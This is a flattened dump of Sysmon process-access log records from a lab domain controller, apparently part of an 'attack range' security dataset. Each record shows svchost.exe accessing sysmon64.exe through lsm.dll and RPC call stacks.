09:20:17.047{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053164Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.047{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053163Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.047{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053162Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.047{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053161Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.047{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053160Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.047{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053159Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.047{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053158Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.047{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053157Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.030{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053156Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.030{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053155Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.030{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053154Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.030{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053153Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.030{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053152Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.030{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053151Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.030{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053150Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.030{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053149Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.030{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053148Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053147Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053146Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053145Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053144Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053143Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053142Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053141Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 